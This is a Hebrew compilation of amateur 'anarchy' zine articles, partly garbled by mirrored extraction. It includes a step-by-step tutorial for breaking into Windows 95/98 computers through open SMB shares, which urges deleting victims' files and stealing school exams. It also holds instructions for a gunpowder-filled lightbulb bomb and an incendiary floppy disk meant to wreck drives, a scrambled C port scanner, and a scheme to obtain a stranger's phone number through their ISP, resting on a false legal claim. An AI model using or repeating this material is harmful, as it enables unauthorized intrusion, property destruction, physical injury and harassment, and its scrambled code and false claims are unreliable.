‫ובכן‪ ,‬סביר להניח שבבית הספר שלכם לדוגמא‪ ,‬ישנה רשת מחשבים מחורבנת‬
‫של המון מחשבים עם ווינדוס ‪ 95/98‬שכולם מחוברים עם איזה חיבור‬
‫מהיר (פחות או יותר) דרך שרת ‪ nt‬וכי לכל המחשבים האלה ישנה רק מדפסת אחת‬
‫או שניים‪ ,‬אך כל המחשבים יכולים להדפיס במדפסת‪ ,‬ויש גם כמה ספריות‪ ,‬על מחשב‬
‫השרת‪ ,‬שלכל המחשבים יש גישה אליהם‪ .‬זה לא כך בכל בית ספר או בכל משרד‬
‫או בכל מוסד חינוכי‪ ,‬או בכל רשת מחשבים עם ווינדוס‪ ,‬אבל זה כך במקרים רבים‪.‬‬
‫חדרתי להמון בתי ספר שרשת המחשבים שלהם הייתה בנויה בצורה כזו‪.‬‬
‫אז איך לעזאזל כל זה עובד?‬
‫מיקרוסופט השיקה יחד עם הווינדוס את האפשרות לשתף מדפסות או קבצים עם‬
‫מחשבים אחרים‪ .‬המחשבים האחרים האלה יכולים להיות מחשבים ממרחק חצי מטר‬
‫שמחוברים למחשב שהפעיל את השיתופים עם כבל‪ ,‬וזה יכול להיות‬
‫המחשב שלכם בבית שנמצא בכלל במדינה אחרת‪ ,‬מדינת היהודים‪.‬‬
‫השיתופים מבוססים על פרוטוקל ה ‪ smb‬שהוא פרוטקול הנותן למחשבים שונים לתקשר‬
‫ביניהם כמו כל פרוטוקול אינטרנט‪ .‬לכן שימוש בשיתופים כאמצעי חדירה יכול גם‬
‫להיעשות ממחשב עם לינוקס (לינוקס תומכת ב ‪.)smb‬‬
‫טוב‪ ,‬אז אתם בטח כבר מתים להתחיל‪ ,‬אבל איזה תוכנה אתם צריכים להוריד? כלום‪.‬‬
‫הכל בא יחד עם הווינדוס‪ .‬במקרה שהווינדוס שלכם צרוב‪ ,‬ישנם סיכויים‬
‫שתיאלצו להשיג לכם עותק מקורי של דיסק ההתקנה של ווינדוס ‪.95/98‬‬
‫אבל כנראה תסתדרו גם בלי זה‪.‬‬
‫בכל אופן‪ ,‬לחצו על התחל ‪ <-‬הגדרות ‪ <-‬לוח בקרה‬
‫לוח הבקרה מלא בשטויות‪ .‬תחפשו קובץ בשם 'רשת' עם סמל של מחשבים שמחוברים למדפסת‪.‬‬
‫לחצו על ה'רשת' פעמיים עם העכבר‪ .‬ייפתח לכם חלון חדש‪ .‬אתם תראו כי רכיבי רשת‬
‫כגון ‪ tcp/ip‬ו ‪ dial-up adapter‬מותקנים אצלכם במחשב‪.‬‬
‫בכדי שתוכלו להשתמש בפרוטוקול ה ‪ smb‬אתם צריכים ש ‪ 3‬רכיבי הרשת הבאים‬
‫יהיו מותקנים לכם במחשב‪:‬‬
‫* ‪tcp/ip‬‬
‫* ‪netbeui‬‬
‫* ‪client for microsoft networks‬‬
‫אם אחד מרכיבים אלה לא נמצא ברשימת הרכיבים‪ ,‬אתם צריכים להוסיף אותו‪.‬‬
‫בלי כל ארבעת רכיבים אלה‪ ,‬אינכם יכולים להתחבר לשיתופים על מחשבים אחרים‬
‫מה שלא נותן לכם גישה לקבצים שלהם‪ .‬חרא‪ .‬אז אני אתן פה הוראות להתקנת כל רכיב‪.‬‬
‫דרך אגב‪ ,‬אם יש לכם עוד רכיבים מותקנים‪ ,‬שלא ציינתי פה‪ ,‬זה בסדר גמור ואין עם‬
‫זה שום בעיה‪ .‬טוב‪ ,‬אז כדי להתקין את מה שאולי חסר לכם‪...‬‬
‫‪tcp/ip‬‬
‫אם חסר לכם רכיב זה‪ ,‬לחצו על הכפתור 'הוספה‪'...‬‬
‫בחרו ב פרוטוקול ‪ <-‬מיקרוסופט ‪ .tcp/ip <-‬יפה‪ .‬ט‪-‬עים מ‪-‬אוד‪.‬‬
‫‪netbeui‬‬

‫אם חסר לכם רכיב זה‪ ,‬לחצו על הכפתור 'הוספה‪'...‬‬
‫בחרו ב פרוטוקול ‪ <-‬מיקרוסופט ‪ .netbeui <-‬יפה‪ .‬ח‪-‬מים‪ .‬מ‪-‬אוד‪.‬‬
‫‪client for microsoft networks‬‬
‫אם חסר לכם רכיב זה‪ ,‬לחצו על הכפתור 'הוספה‪'...‬‬
‫בחרו ב לקוח ‪ <-‬מיקרוסופט ‪ .client for microsoft networks <-‬מ‪-‬געיל‪ .‬בעאה‪.‬‬
‫טוב‪ ,‬אז עכשיו שיש לכם את שלושת הרכיבים אתם כמעט ומוכנים לפריצה הראשונה שלכם‪.‬‬
‫מתחת ל "כניסה ראשית לרשת‪ ":‬בחרו באפשרות ‪.client for microsoft networks‬‬
‫כעת לחצו על כפתור ה ‪ ok‬או פשוט הקישו על מקש ה ‪ .enter‬אתם תתבקשו להפעיל את‬
‫המחשב מחדש‪ .‬עשו זאת‪ .‬אם לא נפתח חלון שביקש ממכם לעשות זאת‪ ,‬עשו זאת בכל מקרה‪.‬‬
‫טוב‪ ,‬נכנסתם לווינדוס מחדש‪ ,‬ואתם רוצים כבר להשיג סיסמאות‪ ,‬כרטיסי אשראי‪,‬‬
‫משחקים‪ ,‬תוכנות‪ ,‬מכתבים אישיים‪ ,‬לשנות ציונים‪ ,‬למחוק לאחרים קבצים‪,‬‬
‫אז איך לעזאזל פורצים???‬
‫אם אני לא טועה זאת אחת השאלות הנפוצות ביותר כיום בעולם הצ'אטים‪.‬‬
‫טוב‪ ,‬אז תמציאו כתובת איי פי של מחשב שאליו אתם מתכוונים לחדור‪.‬‬
‫תבדקו שאתם מחוברים לאינטרנט‪ ,‬פתחו חלון דוס‪ ,‬והקלידו‪:‬‬
‫‪nbtstat -a ipaddress‬‬
‫לדוגמא‪:‬‬
‫‪nbtstat -a 127.0.0.1‬‬
‫חשוב ש ה ‪ -a‬יהיה '‪ 'a‬ולא '‪.'a‬‬
‫בכל מקרה‪ ,‬אם תקבלו כתגובה‪:‬‬
‫‪host not found‬‬
‫זה אומר שלא תוכלו לחדור למחשב זה‪ .‬אז אתם שואלים איך לעזאזל אתם‬
‫אמורים למצוא מחשבים עם שיתופים שאליהם כן תוכלו לחדור???‬
‫ובכן‪ ,‬חשוב שתבינו פה שאין שיטה או קוד אחד שאייתו אפשר לחדור לכל מחשב בעולם‪.‬‬
‫זאת דוגמא טובה לדרך מסוימת לניצול חור אבטחה מסוים במערכת מסוימת‪.‬‬
‫מה שנותן לכם לחדור למחשבים מסוימים‪.‬‬
‫ובכן‪ ,‬יש לכם ‪ 2‬אפשרויות‪:‬‬
‫* חדירה למקום שאתם יודעים בוודאות כי יש לו שיתופים (לדוגמא‪ :‬בית ספר)‪.‬‬
‫* שימוש בסורק שיתופים‪ ,‬ואז לחדור למה שזה מוצא‪.‬‬
‫אז כשיש בידיכם כתובת איי פי של מחשב עם שיתופים‪ ,‬חיזרו לדוס‪ ,‬והקלידו‪:‬‬
‫‪nbtstat -a ipaddress‬‬
‫כאשר במקום ‪ ipaddress‬את מספר האיי פי‪ .‬אתם תקבלו טבלה שנראית בערך ככה‪:‬‬

‫‪netbios remote machine name table‬‬
‫‪name‬‬
‫‪type‬‬
‫‪status‬‬
‫‪--------------------------------------------‬‬‫‪computer <00> unique registered‬‬
‫‪workgroup <00> group‬‬
‫‪registered‬‬
‫‪computer <00> unique registered‬‬
‫‪mac address = 00-00-00-00-00-00‬‬
‫כמו שאתם רואים החלפתי את כל המספרים ל ‪.00‬‬
‫אני רוצה שתתמקדו שנייה באפסים שבין ה ><‪ .‬כאשר אתם רואים שם‬
‫את המספר ‪ ,20‬כלומר >‪ ,<20‬זה אומר שלמחשב זה‪ ,‬קיימים שיתופים‪ .‬כמה מדהים‪.‬‬
‫אוקי‪ ,‬אז הלכתם לבית ספר‪ ,‬בדקתם את כתובת האיי פי של השרת המרכזי‪,‬‬
‫או שעשיתם שימוש בסורק‪ ,‬ומצאתם מחשב עם שיתופים‪ ,‬ובבית קיבלתם טבלה עם המספר‬
‫>‪ <20‬מה שאישר את עצם העובדה כי יש לכם פה מחשב עם פוטנציאל רב‪,‬‬
‫עכשיו אנרכיסטים יקרים‪ ,‬הגיע הזמן לעשות את הדבר הבא‪:‬‬
‫פיתחו את הקובץ‪:‬‬
‫‪c:\windows\lmhosts.sam‬‬
‫קראו אותו עם עורך טקסט ‪ 3 ,2‬פעמים‪ .‬אם לא הבנתם משם כלום‪ ,‬לא נורא‪.‬‬
‫כעת לחצו על התחל ‪ <-‬הפעלה‪ ...‬והקלידו שם ‪ .notepad‬לחצו על מקש ה ‪.enter‬‬
‫זה ייפתח לכם את העורך החביב שלנו‪ .‬תדאגו שאתם מקלידים משמאל לימין של הקובץ‪.‬‬
‫הקלידו שם את האיי פי של המחשב שבו מצאתם שיתופים‪ .‬לדוגמא‪:‬‬
‫‪127.0.0.1‬‬
‫כעת שימרו את הקובץ בשם הבא‪:‬‬
‫‪c:\windows\lmhosts‬‬
‫פשוט כך‪.‬‬
‫אם יש לכם יותר מכתובת איי פי אחת שברצונכם לפרוץ אליה‪,‬‬
‫אז תפרידו בין כתובת לכתובת בעזרת הורדת השורה (עם מקש ה ‪)enter‬‬
‫הקובץ שלכם אמור להיראות כך‪:‬‬
‫‪127.0.0.1‬‬
‫‪112.179.15.9‬‬
‫‪37.105.1.17‬‬
‫טוב‪ ,‬אז יש לכם את הקובץ שמור‪ ,‬ועכשיו‪,‬‬
‫לרגע שחיכיתם לו‪ ...‬לחצו על תפריט התחל ‪ <-‬חפש ‪ <-‬מחשב‬
‫ייפתח לכם חלון חדש עם תיבת טקסט קטנה‪ ,‬הקלידו בה את האיי פי של המחשב‬
‫שאליו ברצונכם לפרוץ‪ ,‬לדוגמא‪ 127.0.0.1 :‬זאת אחרי שהאיי פי ששמרתם את האיי פי‬
‫בקובץ ‪ .c:\windows\lmhosts‬הקישו על מקש ה ‪ enter‬וחכו קצת‪.‬‬
‫לאחר זמן מה זה יימצא לכם מחשב‪ .‬לחצו עליו פעמיים עם העכבר‪.‬‬
‫חלון חדש ייפתח שייתן לכם להשתמש במחשב בדיוק כאילו הוא שלכם!!!‬
‫ברגע זה‪ ,‬שבו אתם מחטטים בקבצים של המחשב הפרוץ הראשון שלכם‪ ,‬אתם צריכים‬
‫להרגיש רגש עצום מלא גאווה‪ ,‬שמחה‪ ,‬והתלהבות‪ .‬עשיתם את זה!‬
‫פצתם למחשב ללא כל שימוש בסוס טרויאני‪ .‬ללא הורדת תוכנת האקינג של מישהו אחר‪.‬‬
‫עשיתם את זה‪ ,‬בעצמכם‪ .‬סחטיין‪.‬‬
‫שאלות ובעיות נפוצות‪:‬‬
‫ש‪ :‬כאשר אני מנסה למחוק לבני זונות קבצים‪ ,‬זה לא מאשר את המחיקה‪.‬‬

‫ת‪ :‬ישנם מחשבים שביטלו את האפשרות של הכתיבה בשיתופים‪ ,‬ולכן יהיה לכם רק‬
‫גישת קריאה מה שאומר שיש לכם גישה לכל הקבצים ותוכלו להעתיק דברים מעניינים‬
‫למחשב שלכם האישי‪ ,‬אבל לא תוכלו להעתיק קבצים ממכם אליהם או למחוק להם דברים‪,‬‬
‫או לגרום לכל שינוי במחשב שלהם‪ .‬גישה כזאת של קריאה בלבד עדיין יכולה להיות‬
‫יעילה ביותר‪ .‬היא לא תיתן לכם לשנות למישהו בבית ספר את הציון בתעודה‪ ,‬אבל תוכלו‬
‫להשיג עותק של המבחן הבא ולחלק אותו לכולם ככה שיהיו מוכנים עם התשובות מראש‪.‬‬
‫ש‪ :‬כשאני לוחץ פעמיים על המחשב שנמצא‪ ,‬זה מבקש סיסמא‪.‬‬
‫ת‪ :‬במקרים מעטים המחשבים שאליהם ברצונכם לפרוץ יהיו מוגנים עם סיסמא‪,‬‬
‫במקרה כזה יש לכם ארבעה אפשרויות‪:‬‬
‫* לנחש את הסיסמא‬
‫* להשתמש בתוכנה שתנסה כל אפשרות בעולם עד שזה יימצא את הסיסמא (לוקח שעות)‪.‬‬
‫* לפרוץ את הסיסמא בעזרת תוכנה שתסיר את הסיסמא בעזרת חור אבטחה‬
‫שנמצא בהגדרת הסיסמא לשיתופים במערכת ווינדוס (גם אופציה זאת תיקח שעות)‪.‬‬
‫* לוותר על המחשב הזה ולנסות מחשב אחר‪.‬‬
‫אני ממליץ לנסות את האפשרות הראשונה‪ ,‬אם לא הולך לכם אז תעברו לאחרונה‪.‬‬
‫אבל תעשו מה שבא לכם‪ ,‬ואיך שבא לכם‪ ,‬כי אחרי הכל‪ ,‬זאת הפריצה שלכם‪.‬‬
‫ש‪ :‬איפה אני יכול למצוא סורק שיתופים?‬
‫ת‪ :‬הנה כמה שמות של סורקים מפורסמים‪:‬‬
‫‪ogre‬‬
‫‪legion‬‬
‫‪nbtscan‬‬
‫‪vir0x‬‬
‫פשוט חפשו אחד מהם באתר חיפוש כגון‪altavista.com :‬‬
‫השימוש בכל סורק שונה‪ ,‬ולכן פשוט קיראו את קובץ ההוראות המצורף‪ ,‬ובהצלחה‪..‬‬
‫ש‪ :‬איך אוכל להשתמש במדפסת על המחשב הפרוץ?‬
‫ת‪ :‬אם תראו שעל המחשב נמצאת מדפסת שגם היא משותפת‪ ,‬לחצו עליה פעמיים‪.‬‬
‫אתם תתבקשו להתקין את הדרייברים על המחשב שלכם‪ .‬אחרי שפעולה זאת הסתיימה‪,‬‬
‫סמנו את הקובץ שברצונכם להדפיס (לא חשוב אם הוא נמצא על המחשב שלכם או שלהם)‬
‫לחצו על ‪ ,ctrl + c‬כעת סמנו את המדפסת על המחשב הפרוץ ולחיצו על ‪.ctrl + v‬‬
‫ההדפסה תחל ותקפיץ את האנשים של המחשב הפרוץ ב ‪ -‬אאאההההההההההה!!!!!!!!!!!‬
‫ש‪ :‬נגנבתי על הפריצה‪ ,‬זה היה ממש מדליק‪ ,‬אבל היא עובדת רק על מחשבים מסוימים‬
‫ואני רוצה לפרוץ לכל המחשבים בעולם‪ .‬איך אני יכול לפרוץ לכל מחשב בלי להוריד‬
‫שום תוכנה סתאם ככה מהמחשב שלי עם ווינדוס וחיבור לאינטרנט?‬
‫ת‪fuck you :‬‬
‫תרגישו חופשי לפרוץ לאן שבא לכם ולהרוס כל מה שבא לכם‪ ,‬הכל על חשבוני‪.‬‬

‫שלכם‪ ,‬גיהינום‬
‫פצצת מנורה‬
‫פעולה אוטומטית בכניסה לחדר חשוך היא הדלקת האור‪.‬‬
‫זה יכול להיות קטלני‪ ...‬אם פצצת מנורה מוקמה במנורת התייקרה‪.‬‬
‫פצצת מנורה היא קלה ביותר להכנה‬
‫בחלק מהמנורות הזכוכית ניתנת לפירוק ע"י חימום של הבסיס עם מבער ריתוך או כיריים‬
‫של מטבח וכשהדבק נהיה חם מספיק זה ניתן להסרה‪.‬‬
‫בחלק אחר של הנורות נדרש חימום נקודתי ע"י מבער ריתוך או מבער אוקסיאצטילן‪.‬‬
‫בכל אחד מהמקרים‪ ,‬לאחר שהבסיס והזכוכית קוררו לטמפרטורת החדר הם ניתנים למילוי‬
‫בחומר נפץ כמו אבק שריפה או כל דבר אחר‪.‬‬
‫אם הזכוכית נותקה מהבסיס היא חייבים להדביק אותה חזרה‪ ,‬ואם נוצר חור בזכוכית‬
‫חייבים לכסות אותו בנייר דבק כדי לשמור את חומר הנפץ בפנים‪.‬‬
‫לאחר מכן כל שנותר לעשות הוא להבריג את המנורה לתוך בית המנורה‬
‫(רצוי לנתק קודם את החשמל לחדר כאמצעי בטיחות ‪):‬‬
‫הכתבה נכתבה ע"י ‪.rel8t‬‬

‫אנרכיה‬
‫בזמן האחרון יש לנו הרבה מקרים של 'אנרכיסטים' שמבינים לא נכון את כל העניין של אנרכיה‪.‬‬
‫כתבתי אנרכיסטים במירכאות כי אלה לא אנרכיסטים‪ .‬הם מייצגים את עצמם ואת עצמם בלבד‪.‬‬
‫ולכן רציתי לכתוב פה כתבה שתסביר מה זה כן האנרכיה‪ .‬מה בעצם נותן לנו את הרשות לונדליזם‪,‬‬
‫או לכל דרך אחרת שבה אנו האנרכיסטים מתבטאים‪ .‬לתת לכם הילדים השמנים בבית‪ ,‬שמשעמם‬
‫להם בחיים ורוצים קצת משהו מעניין ולכן קוראים את המילים האלה‪ ,‬לראות הכל מזווית הראיה‬
‫הנכונה‪.‬‬
‫ובכן‪ ,‬ניסיתי עוד פעם ועוד פעם ועוד פעם לנסח את האמת שעומדת מאחורי כל הרעיון של האנרכיה‪.‬‬
‫או איך שאני רואה אותה לפחות‪ .‬אבל לא משנה מה כתבתי ואיך כתבתי זה לא יצא כמו שרציתי ולא‬
‫הציג‬
‫את הדברים כמו שרציתי שזה יציג אותם‪ .‬לכן כל מה שאני יכול להגיד לכם זה לראות את הסרט‬
‫‪.antz‬‬
‫אם כי הסרט לא ממש מדבר על אנרכיה‪ ,‬והנמלה בסופו של דבר מחליטה שהדרך הטובה ביותר היא‬
‫שלטון‪,‬‬
‫וחיים בתוך מערכת‪ ,‬אלא שהפעם היא חלק מהמערכת מתוך רצון‪ ,‬כאשר לכל אחד יש השפעה חזקה‬
‫וטובה יותר‪,‬‬
‫וכולם (כך נראה לפחות) מרוצים מהשלטון החדש‪ ,‬והפעם הכל בנוי כמו שהנמלה רצתה‪ ,‬הסרט עדיין‬
‫מציג‬
‫בצורה כלשהי קצת את הרעיון של אנרכיה‪ .‬זה לא מציג את זה כמו שהייתי רוצה להציג את זה‪,‬‬
‫אבל זה עדיף מכל הניסיונות שלי להסביר את ראיית העולם שלי כאנרכיסט‪.‬‬
‫תיהנו מהסרט‪.‬‬
‫שלכם‪gehenom ,‬‬

‫פצצת דיסקט‬
‫חומרים‪:‬‬
‫· דיסקט‬
‫· מספריים‬
‫· גפרורי מטבח לבנים או כחולים (חייבים להיות בצבע הזה!!)‬
‫· לכה שקופה לציפורניים‬
‫‪ .1‬פתחו בעדינות את הדיסקט (כאלה של ‪ 3‬אניץ' ומעלה הכי טובים למטרה זאת)‪.‬‬
‫‪ .2‬הסירו את עטיפת הכותנה מבפנים‪.‬‬
‫‪ .3‬גרדו הרבה אבקה מהגפרורים לתוך צלחת (השתמשו במגרדת מעץ‪ ,‬מתכת תצית את הגפרורים‬
‫ביחד איתכם ‪)..‬‬
‫‪ .4‬אחרי שיש לכם הרבה אבקה‪ ,‬פזרו אותה בנדיבות בתוך הדיסקט‪.‬‬
‫‪ .5‬שפכו את הלכה מעל האבקה שפיזרתם‪.‬‬
‫‪ .6‬תנו לעסק להתייבש…‬
‫‪ .7‬בזהירות חברו בחזרה את הדיסק והיעזרו בלכה לסגור אותו מבפנים (איפה שפתחתם)‪.‬‬
‫‪ .8‬תנו את הדיסקט למישהו שאתם מאוד אוהבים…‬
‫מה שיקרה הוא שכשהכונן ינסה לקרוא את הדיסקט תהיה שרפה קטנה (מספיק חום כדי להימס את‬
‫כונן הדיסקטים ולדפוק את ראש הקריאה של הכונן!)‪ .‬צפו בהנאה כשהטכנאים לא מבינים מה עבר‬
‫על המחשב…‬
‫במדריכי האנרכיה הבאים‪ :‬איך להפנט בנאדם בעשר דקות‪ ,‬איך לשגע את רשת מקדולנדס‪ ,‬והשיטות‬
‫הטובות ביותר לגידול מריחואנה בחצר‪ .‬סתאם‪ ,‬לא‪ .‬תהיו ילדים טובים כמוני‪ .‬איכסה אנרכיה‪.‬‬
‫אוהבת תמיד‪,‬‬
‫בלאדי‪.‬‬

‫‪port scaning‬‬
‫אהללללללןןןןן‬
‫מה המצבבבבבבב?‬
‫אז ככה ‪ -‬פעם אחת ניסיתי למצוא אינפו על משהו‪ .‬רציתי להריץ פורט סקאנינג‪ .‬בדרך כלל אני אוהבת‬
‫לנסות להיכנס לפורטים הידועים ידנית (דרך טלנט)‪ ,‬אבל במקרה ההוא אחרי שעשיתי את הבדיקה‬
‫הידנית לפורטים הידועים רציתי להריץ סקנינג כולל‪ ,‬לדעת אם יש איזה פורט פתוח אחר‪ .‬אז העליתי‬
‫את הקומפיילר שלי‪ ,‬וכתבתי משהו מהיר שיעשה בשבילי את העבודה‪.‬‬
‫אז‪ ...‬גיהינום ביקש שאני אפרסם את הקוד פה (זה בשפת ‪ )c‬אז הנה פרסמתי‪ .‬זה היה לפני שהוא עזב‬
‫את האתר ולא יודעת למה הוא לא פרסם את זה עד עכשיו‪ .‬בכל מקרה‪ ,‬אל תשתמשו בזה כפורט סקנר‬
‫כי הוא א‪-‬י‪-‬ט‪-‬י בטירוף (אחרי חצי שעה הוא בקושי הספיק לסרוק פחות מ‪ 50-‬פורטים) אבל זה תרגול‬
‫טוב לסוקטים ולתכנות ברמות הנמוכות שדיסקסתי במדריכים הקודמים ושוב‪ ,‬זה משהו שכתבתי ב‪-‬‬
‫‪ 5‬דקות לצורך מסויים‪ .‬אז נכון שיש הרבה דברים שיכולתי לעשות כדי להאיץ קצת את הפעולה‬
‫(לפתוח כמה סוקטים במקביל‪ ,‬להוציא הוראות מהלולאה) או לשפר אותה קצת (לאפשר גם להתחבר‬
‫ב ‪ dns‬ולא רק בכתובת ‪ ip‬אבל זה תמיד מסתבך לי משום מה) אבל לא היה לי כוח‪.‬‬
‫בעיקרון התוכנה הקטנה הזאת מבקשת את האייפי שאתם רוצים להתחבר אליו (השיגו אותו בעזרת‬
‫‪ )netstat -a‬ומנסה להתחבר לפורטים ‪ 1-1024‬על אותו אייפי‪ .‬שימו לב להוראה ‪for‬‬
‫‪)++)port=1;port<1024;port‬‬
‫שבודקת את הפורטים ‪ .1-1024‬אם בא לכם לבדוק מספרים אחרים‪ ,‬פשוט שנו את המספרים‪( .‬אפשר‬
‫גם לדוגמה להריץ פעמיים את התוכנה כאשר אחת סורקת ‪ 1-50‬ואחת סורקת ‪ 1-100‬וכדומה)‪.‬‬
‫התוכנה שולחת בקשה לפתיחת סוקט בפורטים ‪ .1-1024‬אם הבקשה נענית בחיוב (יש האזנה על‬
‫השרת לאותו פורט) התוכנה רושמת את מספר הפורט על המסך‪.‬‬
‫כמו שאמרתי‪ ,‬זה מ‪-‬א‪-‬ו‪-‬ד א‪-‬י‪-‬ט‪-‬י (אבל מאוד!) אז אל תיבהלו אם אחרי עשר דקות אתם עדיין לא‬
‫רואים כלום על המסך‪.‬‬
‫כדי לבדוק לאיזה פורט התוכנה הגיעה‪ ,‬הקלידו בחלון דוס‪:‬‬
‫‪netstat -a‬‬
‫ותראו את כל הפורטים הפתוחים אצלכם‪ .‬הפורט שלידו כתוב‬
‫‪syn_sent‬‬
‫זהו הפורט אליו מנסה התוכנה להתחבר כרגע‪.‬‬
‫בקשר לקומפיילרים‪ ,‬כמובן שאין אין אין כמו ‪ gcc‬אבל אם אתם כמוני שתקועים על ווינדוס‪ ,‬יש‬
‫תחליף של ‪ lcc‬שזה קומפיילר הבנוי בצורת ‪ .gcc‬קומפיילר מצוין‪ ,‬אבל יש לו את הקריזות שלו‪ ,‬ולכל‬
‫תוכנית צריך לפתוח פרוייקט חדש בכל פעם‪ ,‬ועד שמצליחים ליצור קובץ חדש יוצאת הנשמה‪.‬‬
‫‪>include <stdio.h#‬‬
‫‪>include <winsock.h#‬‬
‫‪>include <winsock32.h#‬‬
‫‪>include <windows.h#‬‬
‫‪)void winsock_init)void‬‬
‫{‬
‫‪;wsadata info‬‬
‫‪)if )wsastartup)makeword)1,1(, &info( != 0‬‬
‫‪;)messagebox)null, "cannot initialize winsock!", "wsastartup", mb_ok‬‬
‫}‬

)][int main)int argc,char *argv
{
/* ...winsock_init)(; /* the windows intialization stuff
;int sockfd
;int port
;struct sockaddr_in dest_addr
/* char ip[16]; /* will hold the ip address we wish to connect to
;)" ?printf("\ndestination ip
;)gets(ip
/* ??bzero)&)my_addr.sin_zero(,8(;*/ /* why this doesn't work*/
)++for )port=1;port<1024;port
{
;)sockfd = socket)af_inet,sock_stream,0
;dest_addr.sin_family = af_inet
;)dest_addr.sin_port = htons)port
;)dest_addr.sin_addr.s_addr = inet_addr)ip
if )connect)sockfd, )struct sockaddr *(&dest_addr, sizeof)struct sockaddr((
)>= 0
{
;)printf)"\n%d", port
/* if connected successfully, return port num */
}
/* shutdown)sockfd,3(; /* close the socket for sending and receiving
}
;)".printf)"connection closed
/* return 0; /* return a success value
}
,have fun
,‫אוהבת‬
.bloody

‫טיפול "משמעתי" בקרציות‬
‫שלום אחים שלי‪.‬‬
‫הנה טריק קטן שחברים שלכם יחשבו שהם גברים‪.‬‬
‫כל אחד מכיר איזה ילד דפוק ומעצבן שמתקרצץ ומנסה לפרוץ לכם למחשב ‪ ,‬לא?‬
‫או סתם איזה מפגר שמעצבן אתכם‪.‬‬
‫פשוט‪.‬‬
‫תדברו אייתו באי סי קיו או באי אר סי‪.‬‬

‫פיתחו חלון דוס‪.‬‬
‫הקלידו ‪.netstat -a‬‬
‫גלו את האי פי או את ההוסט שלו‪.‬‬
‫אם מצאתם איי פי ‪ ,‬זה מצוין‪.‬‬
‫אם מצאת הוסט ‪ ,‬הורידו תוכנה ההופכת הוסט לאיי פי‪.‬‬
‫*** הערה מבלאד ראנר‪ :‬לא צריך תוכנה ההופכת הוסט לאייפי‪ ,‬פשוט הקלידו ‪ netstat -an‬כדי לקבל‬
‫את הכתובת בצורה נומרית (יענתו בצורת אייפי) ***‬
‫עכשיו‪.‬‬
‫הסתכלו על השעון בתחתית המסך‪.‬‬
‫לפי ההוסט ( או האי פי אם אתה טיפה אינטליגנטים) מיצאו את חברת האינטרנט של משתמש זה‪.‬‬
‫עכשיו ‪ ,‬גילשו לאתר של חברת האינטרנט הזאת ‪ ,‬ורישמו את מספר הטלפון שלה‪.‬‬
‫כעט ‪ ,‬התקשרו לחברת האינטרנט ‪ ,‬ואימרו את הדברים הבאים‪:‬‬
‫" מדבר ‪ ....‬הרגע מישהו ניסה לפרוץ לי למחשב ‪ .....‬והאי פי שלו הוא‪.....‬הוא ניסה לפרוץ בשעה‪...‬‬
‫ותשמעו אמינים לא סתם ילדים קטנים שעושים שטויות‪.‬‬
‫עכשיו ‪ ,‬תקראו טוב את מה שאני רושם עכשיו‪:‬‬
‫חברת האינטרנט מחויבת לתת לכם את הטלפון של אותו משתמש!!!!!!!!!!!!‬
‫עכשיו‪...‬‬
‫תתקשרו לאותו בן אדם‪...‬ותגידו לו מה ניסית לפרוץ לי למחשב‪........‬‬
‫‪):‬‬
‫שין שן‬
‫‪icefire3k‬‬

‫גפרורים שמישים מתחת למים‬
‫אתם צריכים‪:‬‬
‫חבילה של ‪ 10‬דיודות סיליקון (תדעו שקיבלתם את הדבר הנכון אם אלה חפצים קטנים מזכוכית)‬‫חבילת גפרורים‬‫נר‬‫הדליקו את הנר ותנו ל"בריכה" של שעווה להיווצר בחלק העליון‬‫הצמידו את החלק מהזכוכית של דיוקה אחת ולפפו את אחד הקצוות שלה מסביב לגפרור והוציאו‬‫את הקצה החוצה‬
‫עשו אותו דבר עם הקצה השני אבל בכיוון מנוגד‪ ,‬עכשיו שני הקצוות צריכים להיות מלופפים מסביב‬
‫לגפרור אבל לא נוגעים אחד בשני!!!!‬
‫הכניסו את ראש הגפרור לתוך "בריכת" השעווה כך שיווצר כיסוי עמיד במים‬‫הכינו כמה כאלה שתרצו‬‫כשהדיודה מחוברת לבטריה של ‪ 6‬וולט‪ ,‬היא מגיעה למה שנקרא מתח שבירה‬‫כשרוב הרכיבים האלקטרוניים מגיעים לנקודה זו‪ ,‬הם מפיקים כמות גדולה של חום ואור(שנמס מהר‬
‫מאוד לכתם קטן)‬
‫החום הזה מספיק כדי להצית את הגפרורים שיעבדו מתחת למים‪( .‬כשרוב הגפרורים מסרבים‬
‫להידלק ‪):‬‬
‫‪icefire3k‬‬

‫שרתי פרוקסי‬
‫"‪"death comes to us all‬‬
‫‪ella shalvi‬‬
‫שרת פרוקסי הוא בעצם שרת אשר דרכו אתם מתחברים לאתר אשר אליו אתם מתחברים‪.‬‬
‫כלווווווווווווווווווווומממממממממממרררר‪....‬‬
‫כשאתם נכנסים לאתר מה שקורה זה שדרך ספק האינטרנט שלכם אתם מתחברים לשרת שעליו‬
‫מאוחסן האתר‪,‬‬
‫והוא נותן לדפדפן שלכם את הקוד של האתר שפעם היה בנוי מ ‪ html‬ומה לעשות שהיום זה לא תמיד‬
‫ככה‪.‬‬
‫היום הוא יכול להיות אומנם מורכב מ ‪ ,html‬אבל זה רק יהיה בין השאר‪...‬‬
‫כי יש לנו את ‪ flash‬של מקרומדיה ואל תשכחו את כל ה ‪script languages‬‬
‫ויש גם ‪ cgi‬ו ‪ asp‬וכו'‪ .‬טוב‪ ,‬בכל מקרה‪ ,‬הדפדפן מקבל את‬
‫האתר בפורמט ‪ html‬ואח"כ מתרגם את זה למה שאתם רואים על המסך‪.‬‬
‫זה פחות‪-‬או‪-‬יותר מה שקורה‪.‬‬
‫יותר פחות מאשר יותר‪.‬‬
‫או מצד שני פחות יותר מאשר פחות‪.‬‬
‫או בעצם‪ ..‬לא חשוב‪.‬‬
‫מה ששונה בשימוש בשרת פרוקסי הוא שבמקום להתחבר "ישירות" אל האתר‪ ,‬אתם עושים זאת דרך‬
‫שרת הפרוקסי‪ .‬מה שגורם לשני דברים עיקריים‪:‬‬
‫‪ .1‬התחברות מהירה יותר ‪ /‬איטית יותר (תלוי)‬
‫‪ .2‬אנונימיות‪.‬‬
‫כן‪ ,‬אנונימיות‪ .‬לא‪ ,‬א‪.‬נ‪.‬ו‪.‬נ‪.‬י‪.‬מ‪.‬י‪.‬ו‪.‬ת‪.‬‬
‫כן‪ ,‬לא‪ ,‬כן‪ ,‬לא‪ ,‬כן כן כן כן כן כן כן כן כן‪.‬‬
‫מה גורם להתחברות מהירה יותר?‬
‫ובכן‪ ,‬בואו נאמר שהמחשב שלכם הוא ‪ a‬והאתר שאליו אתם רוצים להגיע הוא ‪.b‬‬
